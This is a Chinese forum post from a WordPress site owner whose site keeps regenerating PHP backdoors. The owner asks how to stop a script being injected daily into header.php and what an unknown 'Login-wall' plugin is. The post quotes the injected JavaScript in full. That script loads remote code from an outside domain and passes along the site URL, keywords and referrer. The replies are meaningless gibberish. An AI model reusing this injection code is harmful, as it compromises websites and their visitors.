关于后门的苦恼。。另外问下login_wall.php这是个啥文件。

问题1:

WP程序里面多了很多PHP后门文件,部分WP文件被修改。删除之后又会重新生成。
经过我反复尝试,包括部分插件的删除安装,代码的官方覆盖等等方法。
现在只剩下一个问题。每天我的主题 Header.php文件里都会被插入一段代码(还是没法解决),其他的文件倒不会再被修改了。
(FTP看是没有修改时间变更,应该是代码自动插入)
代码如下:
 
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'J18171' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
 
问题二:我搜索数据库,发现有个地方引用这个插件
/wp-content/plugins/Login-wall-BteYb/login_wall.php
第一,这个插件我没有装过,在我的插件中确实自己出现过,后来我清理掉了,数据库怎么还会有这个。
第二,这是个啥玩意,我百度发现没有相关的问题,只有很多不能访问的WP站点报错路径中会有这个出现。
求高手解答。如果能搞定。我发个大红包也可以啊。
已邀请:

[已注销]

赞同来自:

dsafvsdb

[已注销]

赞同来自:

asvsdn

[已注销]

赞同来自:

阿女索多富女
 

[已注销]

赞同来自:

sdgvsdfbn

[已注销]

赞同来自:

asfcdsb

[已注销]

赞同来自:

wefreh

[已注销]

赞同来自:

asdvdsn

[已注销]

赞同来自:

cndfm

要回复问题请先登录注册